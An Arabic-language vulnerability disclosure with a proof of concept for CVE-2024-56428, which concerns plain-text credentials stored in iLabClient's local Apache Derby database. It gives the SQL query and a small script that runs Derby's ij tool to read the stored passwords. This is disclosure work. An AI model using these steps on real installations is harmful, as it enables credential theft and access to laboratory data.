
استغلال إثبات مفهوم (Proof-of-concept) لثغرة CVE-2024-56428 يقرأ بيانات الاعتماد بنص واضح من قاعدة بيانات Apache Derby المحلية الخاصة بتطبيق iLabClient.
بيانات الاعتماد النصية الصريحة في قاعدة البيانات المحلية لـ iLabClient
يُستخدم iLabClient لتنزيل النتائج من خادم المختبر. يتم تخزين بيانات التكوين محليًا في مثيل Apache Derby iLabClient. يتم تخزين كلمة المرور كنص عادي. لقراءة ذلك، يجب أولاً إنشاء اتصال بقاعدة البيانات المحلية، على سبيل المثال كما هو موضح في CVE-2024-56429.
اقرأ كلمات المرور:
select EINSTELLUNGEN from configs;
يمكن تنفيذ البرنامج النصي get_configs.sh لقراءة بيانات التكوين. من المهم ألا يقوم أي برنامج آخر (مثل iLabClient نفسه) بالوصول إلى قاعدة البيانات أثناء التنفيذ.
شروحات للبرنامج النصي:
#! /bin/bash
"C:\ilabClient\java8u422\bin\java.exe" -jar ".\derby-lib\derbyrun.jar" ij script_sql.sql
read
"C:\ilabClient\java8u422\bin\java.exe": استخدام إصدار Java المرفق مع تثبيت العميل. قم بتغيير هذا إذا تم تثبيت العميل في دليل مختلف.
-jar: تعليمات بأنه سيتم تنفيذ ملف JAR
".\derby-lib\derbyrun.jar ij" تنفيذ أداة ij من Apache Derby
script_sql.sql: برنامج نصي يقرأ التكوينات المقابلة. قم بتغيير المسار إلى قاعدة البيانات في هذا الملف عندما يتم تثبيت العميل في دليل مختلف.
المكتشف: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)